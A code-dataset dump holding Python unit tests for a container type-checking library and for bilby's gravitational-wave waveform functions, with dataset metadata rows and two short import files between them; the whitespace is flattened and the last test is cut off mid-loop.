with self.assertRaises(WrongTypeError) as err:
_ = AllInt(inputs.keys())
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_wrong_unnamed_dict_values_with_one_type(self):
AllStr = All(str)
log_msg = ["ERROR:root:Type of value in dict_values(['four', 5])"
" must be str, not int like 5!"]
err_msg = ("Type of value in dict_values(['four', 5])"
" must be str, not int like 5!")
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(WrongTypeError) as err:
_ = AllStr({4: 'four', 5.0: 5}.values())
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_wrong_unnamed_ordered_dict_values_with_one_type(self):
AllStr = All(str)
inputs = OrderedDict({4: 'four', 5.0: 5})
log_msg = ["ERROR:root:Type of value in odict_values(['four', 5])"
" must be str, not int like 5!"]
err_msg = ("Type of value in odict_values(['four', 5])"
" must be str, not int like 5!")
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(WrongTypeError) as err:
_ = AllStr(inputs.values())
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_wrong_unnamed_defaultdict_values_with_one_type(self):
AllStr = All(str)
inputs = defaultdict(str, {4: 'four', 5.0: 5})
log_msg = ["ERROR:root:Type of value in dict_values(['four', 5])"
" must be str, not int like 5!"]
err_msg = ("Type of value in dict_values(['four', 5])"
" must be str, not int like 5!")
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(WrongTypeError) as err:
_ = AllStr(inputs.values())
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_wrong_unnamed_set_with_one_type(self):
AllInt = All(int)
log_msg = ["ERROR:root:Type of element in set {4, "
"5.0} must be int, not float like 5.0!"]
err_msg = ("Type of element in set {4, 5.0} must"
" be int, not float like 5.0!")
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(WrongTypeError) as err:
_ = AllInt({4, 5.0})
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_wrong_unnamed_frozenset_with_one_type(self):
AllInt = All(int)
log_msg = ["ERROR:root:Type of element in frozenset({4, "
"5.0}) must be int, not float like 5.0!"]
err_msg = ("Type of element in frozenset({4, 5.0}) must"
" be int, not float like 5.0!")
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(WrongTypeError) as err:
_ = AllInt(frozenset({4, 5.0}))
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
class TestAllErrorNamedOneType(ut.TestCase):
def test_error_on_wrong_named_tuple_with_one_type(self):
AllInt = All(int)
log_msg = ['ERROR:root:Type of element 1 in tuple '
'test must be int, not float like 5.0!']
err_msg = ('Type of element 1 in tuple test '
'must be int, not float like 5.0!')
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(WrongTypeError) as err:
_ = AllInt((4, 5.0), 'test')
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_wrong_named_list_with_one_type(self):
AllInt = All(int)
log_msg = ['ERROR:root:Type of element 1 in list '
'test must be int, not float like 5.0!']
err_msg = ('Type of element 1 in list test '
'must be int, not float like 5.0!')
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(WrongTypeError) as err:
_ = AllInt([4, 5.0], 'test')
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_wrong_named_deque_with_one_type(self):
AllInt = All(int)
log_msg = ['ERROR:root:Type of element 1 in deque '
'test must be int, not float like 5.0!']
err_msg = ('Type of element 1 in deque test '
'must be int, not float like 5.0!')
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(WrongTypeError) as err:
_ = AllInt(deque([4, 5.0]), 'test')
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_wrong_named_dict_with_one_type(self):
AllInt = All(int)
inputs = {4: 'four', 5.0: 'five'}
log_msg = ['ERROR:root:Type of key in dict test'
' must be int, not float like 5.0!']
err_msg = ('Type of key in dict test must'
' be int, not float like 5.0!')
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(WrongTypeError) as err:
_ = AllInt(inputs, 'test')
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_wrong_named_ordered_dict_with_one_type(self):
AllInt = All(int)
inputs = OrderedDict({4: 'four', 5.0: 'five'})
log_msg = ['ERROR:root:Type of key in OrderedDict test'
' must be int, not float like 5.0!']
err_msg = ('Type of key in OrderedDict test must'
' be int, not float like 5.0!')
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(WrongTypeError) as err:
_ = AllInt(inputs, 'test')
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_wrong_named_defaultdict_with_one_type(self):
AllInt = All(int)
inputs = defaultdict(str, {4: 'four', 5.0: 'five'})
log_msg = ['ERROR:root:Type of key in defaultdict test'
' must be int, not float like 5.0!']
err_msg = ('Type of key in defaultdict test must'
' be int, not float like 5.0!')
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(WrongTypeError) as err:
_ = AllInt(inputs, 'test')
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_wrong_named_dict_keys_with_one_type(self):
AllInt = All(int)
inputs = {4: 'four', 5.0: 'five'}
log_msg = ['ERROR:root:Type of key in dict test'
' must be int, not float like 5.0!']
err_msg = ('Type of key in dict test must'
' be int, not float like 5.0!')
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(WrongTypeError) as err:
_ = AllInt(inputs.keys(), 'test')
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_wrong_named_ordered_dict_keys_with_one_type(self):
AllInt = All(int)
inputs = OrderedDict({4: 'four', 5.0: 'five'})
log_msg = ['ERROR:root:Type of key in dict test'
' must be int, not float like 5.0!']
err_msg = ('Type of key in dict test must'
' be int, not float like 5.0!')
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(WrongTypeError) as err:
_ = AllInt(inputs.keys(), 'test')
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_wrong_named_defaultdict_keys_with_one_type(self):
AllInt = All(int)
inputs = defaultdict(str, {4: 'four', 5.0: 'five'})
log_msg = ['ERROR:root:Type of key in dict test'
' must be int, not float like 5.0!']
err_msg = ('Type of key in dict test must'
' be int, not float like 5.0!')
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(WrongTypeError) as err:
_ = AllInt(inputs.keys(), 'test')
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_wrong_named_dict_values_with_one_type(self):
AllStr = All(str)
inputs = {4: 'four', 5.0: 5}
log_msg = ['ERROR:root:Type of value in dict '
'test must be str, not int like 5!']
err_msg = ('Type of value in dict test '
'must be str, not int like 5!')
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(WrongTypeError) as err:
_ = AllStr(inputs.values(), 'test')
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_wrong_named_ordered_dict_values_with_one_type(self):
AllStr = All(str)
inputs = OrderedDict({4: 'four', 5.0: 5})
log_msg = ['ERROR:root:Type of value in dict '
'test must be str, not int like 5!']
err_msg = ('Type of value in dict test '
'must be str, not int like 5!')
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(WrongTypeError) as err:
_ = AllStr(inputs.values(), 'test')
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_wrong_named_defaultdict_values_with_one_type(self):
AllStr = All(str)
inputs = defaultdict(str, {4: 'four', 5.0: 5})
log_msg = ['ERROR:root:Type of value in dict '
'test must be str, not int like 5!']
err_msg = ('Type of value in dict test '
'must be str, not int like 5!')
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(WrongTypeError) as err:
_ = AllStr(inputs.values(), 'test')
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_wrong_named_set_with_one_type(self):
AllInt = All(int)
log_msg = ['ERROR:root:Type of element in set test'
' must be int, not float like 5.0!']
err_msg = ('Type of element in set test must'
' be int, not float like 5.0!')
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(WrongTypeError) as err:
_ = AllInt({4, 5.0}, 'test')
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_wrong_named_frozenset_with_one_type(self):
AllInt = All(int)
log_msg = ['ERROR:root:Type of element in frozenset test'
' must be int, not float like 5.0!']
err_msg = ('Type of element in frozenset test must'
' be int, not float like 5.0!')
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(WrongTypeError) as err:
_ = AllInt(frozenset({4, 5.0}), 'test')
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
class TestAllErrorTowTypes(ut.TestCase):
def test_error_on_wrong_unnamed_variable_with_two_types(self):
AllNum = All(int, float)
log_msg = ["ERROR:root:Type of element 2 in tuple (4, 5.0, 'bar')"
" must be one of ('int', 'float'), not str like bar!"]
err_msg = ("Type of element 2 in tuple (4, 5.0, 'bar') must"
" be one of ('int', 'float'), not str like bar!")
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(WrongTypeError) as err:
_ = AllNum((4, 5.0, 'bar'))
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_wrong_unnamed_dict_with_two_types(self):
AllNum = All(int, float)
log_msg = ["ERROR:root:Type of key in dict {4: 'four', 'bar': 3}"
" must be one of ('int', 'float'), not str like bar!"]
err_msg = ("Type of key in dict {4: 'four', 'bar': 3} must"
" be one of ('int', 'float'), not str like bar!")
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(WrongTypeError) as err:
_ = AllNum({4: 'four', 'bar': 3})
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_wrong_unnamed_dict_key_with_two_types(self):
AllNum = All(int, float)
log_msg = ["ERROR:root:Type of key in dict_keys([4, 'bar'])"
" must be one of ('int', 'float'), not str like bar!"]
err_msg = ("Type of key in dict_keys([4, 'bar']) must"
" be one of ('int', 'float'), not str like bar!")
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(WrongTypeError) as err:
_ = AllNum({4: 'four', 'bar': 3}.keys())
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_wrong_unnamed_dict_value_with_two_types(self):
AllNum = All(int, float)
log_msg = ["ERROR:root:Type of value in dict_values(['four', 3])"
" must be one of ('int', 'float'), not str like four!"]
err_msg = ("Type of value in dict_values(['four', 3]) must"
" be one of ('int', 'float'), not str like four!")
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(WrongTypeError) as err:
_ = AllNum({4: 'four', 'bar': 3}.values())
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_wrong_unnamed_set_with_two_types(self):
AllNum = All(int, float)
with self.assertLogs(level=logging.ERROR):
with self.assertRaises(WrongTypeError):
_ = AllNum({4, 'bar'})
def test_error_on_wrong_unnamed_frozenset_with_two_types(self):
AllNum = All(int, float)
with self.assertLogs(level=logging.ERROR):
with self.assertRaises(WrongTypeError):
_ = AllNum(frozenset({4, 'bar'}))
def test_error_on_wrong_named_variable_with_two_types(self):
AllNum = All(int, float)
log_msg = ["ERROR:root:Type of element 2 in tuple test must"
" be one of ('int', 'float'), not str like bar!"]
err_msg = ("Type of element 2 in tuple test must be one"
" of ('int', 'float'), not str like bar!")
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(WrongTypeError) as err:
_ = AllNum((4, 5.0, 'bar'), 'test')
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_wrong_named_dict_with_two_types(self):
AllNum = All(int, float)
log_msg = ["ERROR:root:Type of key in dict test must be"
" one of ('int', 'float'), not str like bar!"]
err_msg = ("Type of key in dict test must be one of"
" ('int', 'float'), not str like bar!")
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(WrongTypeError) as err:
_ = AllNum({4: 'four', 5.0: 'five', 'bar': 3}, 'test')
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_wrong_named_dict_key_with_two_types(self):
AllNum = All(int, float)
log_msg = ["ERROR:root:Type of key in dict test must be"
" one of ('int', 'float'), not str like bar!"]
err_msg = ("Type of key in dict test must be one of"
" ('int', 'float'), not str like bar!")
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(WrongTypeError) as err:
_ = AllNum({4: 'four', 5.0: 'five', 'bar': 3}.keys(), 'test')
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_wrong_named_dict_value_with_two_types(self):
AllNum = All(int, float)
log_msg = ["ERROR:root:Type of value in dict test must be"
" one of ('int', 'float'), not str like four!"]
err_msg = ("Type of value in dict test must be one of"
" ('int', 'float'), not str like four!")
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(WrongTypeError) as err:
_ = AllNum({4: 'four', 5.0: 'five', 'bar': 3}.values(), 'test')
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_wrong_named_set_with_two_types(self):
AllNum = All(int, float)
log_msg = ["ERROR:root:Type of element in set test must be"
" one of ('int', 'float'), not str like bar!"]
err_msg = ("Type of element in set test must be one of"
" ('int', 'float'), not str like bar!")
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(WrongTypeError) as err:
_ = AllNum({4, 5.0, 'bar'}, 'test')
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_wrong_named_frozenset_with_two_types(self):
AllNum = All(int, float)
log_msg = ["ERROR:root:Type of element in frozenset test must be"
" one of ('int', 'float'), not str like bar!"]
err_msg = ("Type of element in frozenset test must be one of"
" ('int', 'float'), not str like bar!")
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(WrongTypeError) as err:
_ = AllNum(frozenset({4, 5.0, 'bar'}), 'test')
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
class TestAllMethods(ut.TestCase):
def test_has_iterable_type_checker_attributes(self):
AllNum = All(int, float)
for iterable in _REDUCED_ITER:
self.assertTrue(hasattr(AllNum, iterable.__name__))
self.assertTrue(hasattr(AllNum, 'NonEmpty'))
def test_iterable_type_checkers_are_type_CompositionOf(self):
AllNum = All(int, float)
for iterable in _REDUCED_ITER:
type_checker = getattr(AllNum, iterable.__name__)
self.assertIsInstance(type_checker, CompositionOf)
self.assertIsInstance(AllNum.NonEmpty, CompositionOf)
def test_has_attribute_NonEmpty(self):
AllInt = All(int)
self.assertTrue(hasattr(AllInt, 'NonEmpty'))
def test_attribute_NonEmpty_is_type_CompositionOf(self):
AllInt = All(int)
self.assertIsInstance(AllInt.NonEmpty, CompositionOf)
def test_has_attribute_JustLen(self):
AllInt = All(int)
self.assertTrue(hasattr(AllInt, 'JustLen'))
def test_attribute_JustLen_is_type_CompositionOf(self):
AllInt = All(int)
self.assertIsInstance(AllInt.JustLen, CompositionOf)
def test_works_through_type_and_non_empty_checkers(self):
AllInt = All(int)
log_msg = ['ERROR:root:Type of element 1 in tuple '
'test must be int, not float like 5.0!']
err_msg = ('Type of element 1 in tuple test '
'must be int, not float like 5.0!')
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(WrongTypeError) as err:
_ = AllInt.NonEmpty.JustTuple((4, 5.0), 'test')
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_works_through_dict_and_just_length_checkers(self):
AllInt = All(int)
inputs = {4: 'four', 5.0: 'five'}
log_msg = ['ERROR:root:Type of key in dict test'
' must be int, not float like 5.0!']
err_msg = ('Type of key in dict test must'
' be int, not float like 5.0!')
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(WrongTypeError) as err:
_ = AllInt.JustLen.JustDict(inputs, 'test', length=2)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_has_attribute_o(self):
AllInt = All(int)
self.assertTrue(hasattr(AllInt, 'o'))
def test_attribute_o_is_callable(self):
AllInt = All(int)
self.assertTrue(callable(AllInt.o))
def test_o_returns_composition(self):
AllInt = All(int)
AllNum = All(int, float)
composition = AllInt.o(AllNum)
self.assertIsInstance(composition, CompositionOf)
def test_o_raises_error_on_argument_not_callable(self):
AllInt = All(int)
err_msg = ('foo must be a callable that accepts (i) a value,'
' (ii) an optional name for that value, and (iii)'
' any number of keyword arguments!')
with self.assertRaises(CallableError) as err:
_ = AllInt.o('foo')
self.assertEqual(str(err.exception), err_msg)
if __name__ == '__main__':
ut.main()
| 45.277556
| 79
| 0.59993
| 4,621
| 34,094
| 4.254058
| 0.033759
| 0.01109
| 0.021976
| 0.029301
| 0.880456
| 0.857615
| 0.833299
| 0.816105
| 0.793061
| 0.779428
| 0
| 0.015518
| 0.277996
| 34,094
| 752
| 80
| 45.337766
| 0.783068
| 0
| 0
| 0.589666
| 0
| 0.00152
| 0.205989
| 0.001232
| 0
| 0
| 0
| 0
| 0.337386
| 1
| 0.121581
| false
| 0
| 0.010638
| 0
| 0.141337
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
91fa15827187db8b09f525073dd6fe44418d18f3
| 24
|
py
|
Python
|
emmer/__init__.py
|
blha303/emmer
|
1435310b2b4e63844700cbe26746d5c7ee0008e0
|
[
"MIT"
] | 10
|
2015-01-11T20:53:46.000Z
|
2021-07-13T10:56:44.000Z
|
emmer/__init__.py
|
blha303/emmer
|
1435310b2b4e63844700cbe26746d5c7ee0008e0
|
[
"MIT"
] | null | null | null |
emmer/__init__.py
|
blha303/emmer
|
1435310b2b4e63844700cbe26746d5c7ee0008e0
|
[
"MIT"
] | 6
|
2015-03-29T21:19:17.000Z
|
2020-11-18T18:32:47.000Z
|
from emmer import Emmer
| 12
| 23
| 0.833333
| 4
| 24
| 5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 24
| 1
| 24
| 24
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
62080f83979b7cb245b1c964fa26ff140c7ecee7
| 142
|
py
|
Python
|
ZhiHu-Spider/database/__init__.py
|
xll-1994/ZhiHuSpider
|
f211cc24ad11ca632d0654812e17dd98088683cd
|
[
"MIT"
] | 1
|
2022-01-07T05:01:32.000Z
|
2022-01-07T05:01:32.000Z
|
ZhiHu-Spider/database/__init__.py
|
xll-1994/ZhiHuSpider
|
f211cc24ad11ca632d0654812e17dd98088683cd
|
[
"MIT"
] | 3
|
2022-01-07T05:49:44.000Z
|
2022-01-17T07:31:16.000Z
|
ZhiHu-Spider/database/__init__.py
|
xll-1994/ZhiHuSpider
|
f211cc24ad11ca632d0654812e17dd98088683cd
|
[
"MIT"
] | 1
|
2022-01-07T06:48:40.000Z
|
2022-01-07T06:48:40.000Z
|
from database.redis_client import RedisClient
from database.mysql_client import MysqlClient
from database.mongodb_client import MongoDBClient
| 35.5
| 49
| 0.894366
| 18
| 142
| 6.888889
| 0.555556
| 0.290323
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.084507
| 142
| 3
| 50
| 47.333333
| 0.953846
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
627278a337df155d09a82a342e3e80bc4bf6608f
| 14,867
|
py
|
Python
|
test/gw/source_test.py
|
deepchatterjeeligo/bilby
|
6532c63d0d970ad33478ae0b1c28d4c570b74047
|
[
"MIT"
] | null | null | null |
test/gw/source_test.py
|
deepchatterjeeligo/bilby
|
6532c63d0d970ad33478ae0b1c28d4c570b74047
|
[
"MIT"
] | null | null | null |
test/gw/source_test.py
|
deepchatterjeeligo/bilby
|
6532c63d0d970ad33478ae0b1c28d4c570b74047
|
[
"MIT"
] | null | null | null |
import unittest
import numpy as np
from copy import copy
import bilby
import lal
import lalsimulation
class TestLalBBH(unittest.TestCase):
def setUp(self):
self.parameters = dict(
mass_1=30.0,
mass_2=30.0,
luminosity_distance=400.0,
a_1=0.4,
tilt_1=0.2,
phi_12=1.0,
a_2=0.8,
tilt_2=2.7,
phi_jl=2.9,
theta_jn=0.3,
phase=0.0,
)
self.waveform_kwargs = dict(
waveform_approximant="IMRPhenomPv2",
reference_frequency=50.0,
minimum_frequency=20.0,
catch_waveform_errors=True,
)
self.frequency_array = bilby.core.utils.create_frequency_series(2048, 4)
self.bad_parameters = copy(self.parameters)
self.bad_parameters["mass_1"] = -30.0
def tearDown(self):
del self.parameters
del self.waveform_kwargs
del self.frequency_array
del self.bad_parameters
def test_lal_bbh_works_runs_valid_parameters(self):
self.parameters.update(self.waveform_kwargs)
self.assertIsInstance(
bilby.gw.source.lal_binary_black_hole(
self.frequency_array, **self.parameters
),
dict,
)
def test_waveform_error_catching(self):
self.bad_parameters.update(self.waveform_kwargs)
self.assertIsNone(
bilby.gw.source.lal_binary_black_hole(
self.frequency_array, **self.bad_parameters
)
)
def test_waveform_error_raising(self):
raise_error_parameters = copy(self.bad_parameters)
raise_error_parameters.update(self.waveform_kwargs)
raise_error_parameters["catch_waveform_errors"] = False
with self.assertRaises(Exception):
bilby.gw.source.lal_binary_black_hole(
self.frequency_array, **raise_error_parameters
)
def test_lal_bbh_works_without_waveform_parameters(self):
self.assertIsInstance(
bilby.gw.source.lal_binary_black_hole(
self.frequency_array, **self.parameters
),
dict,
)
# Removed due to issue with SimInspiralFD - see https://git.ligo.org/lscsoft/lalsuite/issues/153
# def test_lal_bbh_works_with_time_domain_approximant(self):
# self.waveform_kwargs['waveform_approximant'] = 'SEOBNRv3'
# self.parameters.update(self.waveform_kwargs)
# self.assertIsInstance(
# bilby.gw.source.lal_binary_black_hole(
# self.frequency_array, **self.parameters), dict)
def test_lal_bbh_xpprecession_version(self):
self.parameters.update(self.waveform_kwargs)
self.parameters["waveform_approximant"] = "IMRPhenomXP"
# Test that we can modify the XP precession version
out_v223 = bilby.gw.source.lal_binary_black_hole(
self.frequency_array, PhenomXPrecVersion=223, **self.parameters
)
out_v102 = bilby.gw.source.lal_binary_black_hole(
self.frequency_array, PhenomXPrecVersion=102, **self.parameters
)
self.assertFalse(np.all(out_v223["plus"] == out_v102["plus"]))
class TestLalBNS(unittest.TestCase):
def setUp(self):
self.parameters = dict(
mass_1=1.4,
mass_2=1.4,
luminosity_distance=400.0,
a_1=0.4,
a_2=0.3,
tilt_1=0.2,
tilt_2=1.7,
phi_jl=0.2,
phi_12=0.9,
theta_jn=1.7,
phase=0.0,
lambda_1=100.0,
lambda_2=100.0,
)
self.waveform_kwargs = dict(
waveform_approximant="IMRPhenomPv2_NRTidal",
reference_frequency=50.0,
minimum_frequency=20.0,
)
self.frequency_array = bilby.core.utils.create_frequency_series(2048, 4)
def tearDown(self):
del self.parameters
del self.waveform_kwargs
del self.frequency_array
def test_lal_bns_runs_with_valid_parameters(self):
self.parameters.update(self.waveform_kwargs)
self.assertIsInstance(
bilby.gw.source.lal_binary_neutron_star(
self.frequency_array, **self.parameters
),
dict,
)
def test_lal_bns_works_without_waveform_parameters(self):
self.assertIsInstance(
bilby.gw.source.lal_binary_neutron_star(
self.frequency_array, **self.parameters
),
dict,
)
def test_fails_without_tidal_parameters(self):
self.parameters.pop("lambda_1")
self.parameters.pop("lambda_2")
self.parameters.update(self.waveform_kwargs)
with self.assertRaises(TypeError):
bilby.gw.source.lal_binary_neutron_star(
self.frequency_array, **self.parameters
)
class TestEccentricLalBBH(unittest.TestCase):
def setUp(self):
self.parameters = dict(
mass_1=30.0,
mass_2=30.0,
luminosity_distance=400.0,
theta_jn=0.0,
phase=0.0,
eccentricity=0.1,
)
self.waveform_kwargs = dict(
waveform_approximant="EccentricFD",
reference_frequency=10.0,
minimum_frequency=10.0,
)
self.frequency_array = bilby.core.utils.create_frequency_series(2048, 4)
def tearDown(self):
del self.parameters
del self.waveform_kwargs
del self.frequency_array
def test_lal_ebbh_works_runs_valid_parameters(self):
self.parameters.update(self.waveform_kwargs)
self.assertIsInstance(
bilby.gw.source.lal_eccentric_binary_black_hole_no_spins(
self.frequency_array, **self.parameters
),
dict,
)
def test_lal_ebbh_works_without_waveform_parameters(self):
self.assertIsInstance(
bilby.gw.source.lal_eccentric_binary_black_hole_no_spins(
self.frequency_array, **self.parameters
),
dict,
)
def test_fails_without_eccentricity(self):
self.parameters.pop("eccentricity")
self.parameters.update(self.waveform_kwargs)
with self.assertRaises(TypeError):
bilby.gw.source.lal_eccentric_binary_black_hole_no_spins(
self.frequency_array, **self.parameters
)
class TestROQBBH(unittest.TestCase):
def setUp(self):
roq_dir = "/roq_basis"
fnodes_linear_file = "{}/fnodes_linear.npy".format(roq_dir)
fnodes_linear = np.load(fnodes_linear_file).T
fnodes_quadratic_file = "{}/fnodes_quadratic.npy".format(roq_dir)
fnodes_quadratic = np.load(fnodes_quadratic_file).T
self.parameters = dict(
mass_1=30.0,
mass_2=30.0,
luminosity_distance=400.0,
a_1=0.0,
tilt_1=0.0,
phi_12=0.0,
a_2=0.0,
tilt_2=0.0,
phi_jl=0.0,
theta_jn=0.0,
phase=0.0,
)
self.waveform_kwargs = dict(
frequency_nodes_linear=fnodes_linear,
frequency_nodes_quadratic=fnodes_quadratic,
reference_frequency=50.0,
minimum_frequency=20.0,
approximant="IMRPhenomPv2",
)
self.frequency_array = bilby.core.utils.create_frequency_series(2048, 4)
def tearDown(self):
del self.parameters
del self.waveform_kwargs
del self.frequency_array
def test_roq_runs_valid_parameters(self):
self.parameters.update(self.waveform_kwargs)
self.assertIsInstance(
bilby.gw.source.binary_black_hole_roq(self.frequency_array, **self.parameters), dict
)
def test_roq_fails_without_frequency_nodes(self):
self.parameters.update(self.waveform_kwargs)
del self.parameters["frequency_nodes_linear"]
del self.parameters["frequency_nodes_quadratic"]
with self.assertRaises(KeyError):
bilby.gw.source.binary_black_hole_roq(self.frequency_array, **self.parameters)
class TestBBHfreqseq(unittest.TestCase):
def setUp(self):
self.parameters = dict(
mass_1=30.0,
mass_2=30.0,
luminosity_distance=400.0,
a_1=0.4,
tilt_1=0.,
phi_12=0.,
a_2=0.8,
tilt_2=0.,
phi_jl=0.,
theta_jn=0.3,
phase=0.0
)
minimum_frequency = 20.0
self.frequency_array = bilby.core.utils.create_frequency_series(2048, 8)
self.full_frequencies_to_sequence = self.frequency_array >= minimum_frequency
self.waveform_kwargs = dict(
waveform_approximant="IMRPhenomHM",
reference_frequency=50.0,
minimum_frequency=minimum_frequency,
catch_waveform_errors=True,
frequencies=self.frequency_array[self.full_frequencies_to_sequence]
)
self.bad_parameters = copy(self.parameters)
self.bad_parameters["mass_1"] = -30.0
def tearDown(self):
del self.parameters
del self.waveform_kwargs
del self.frequency_array
del self.bad_parameters
def test_valid_parameters(self):
self.parameters.update(self.waveform_kwargs)
self.assertIsInstance(
bilby.gw.source.binary_black_hole_frequency_sequence(
self.frequency_array, **self.parameters
),
dict
)
def test_waveform_error_catching(self):
self.bad_parameters.update(self.waveform_kwargs)
self.assertIsNone(
bilby.gw.source.binary_black_hole_frequency_sequence(
self.frequency_array, **self.bad_parameters
)
)
def test_waveform_error_raising(self):
raise_error_parameters = copy(self.bad_parameters)
raise_error_parameters.update(self.waveform_kwargs)
raise_error_parameters["catch_waveform_errors"] = False
with self.assertRaises(Exception):
bilby.gw.source.binary_black_hole_frequency_sequence(
self.frequency_array, **raise_error_parameters
)
def test_match_LalBBH(self):
self.parameters.update(self.waveform_kwargs)
freqseq = bilby.gw.source.binary_black_hole_frequency_sequence(
self.frequency_array, **self.parameters
)
lalbbh = bilby.gw.source.lal_binary_black_hole(
self.frequency_array, **self.parameters
)
self.assertEqual(freqseq.keys(), lalbbh.keys())
for mode in freqseq:
diff = np.sum(np.abs(freqseq[mode] - lalbbh[mode][self.full_frequencies_to_sequence])**2.)
norm = np.sum(np.abs(freqseq[mode])**2.)
self.assertLess(diff / norm, 1e-15)
def test_match_LalBBH_specify_modes(self):
parameters = copy(self.parameters)
parameters.update(self.waveform_kwargs)
parameters['mode_array'] = [[2, 2]]
freqseq = bilby.gw.source.binary_black_hole_frequency_sequence(
self.frequency_array, **parameters
)
lalbbh = bilby.gw.source.lal_binary_black_hole(
self.frequency_array, **parameters
)
self.assertEqual(freqseq.keys(), lalbbh.keys())
for mode in freqseq:
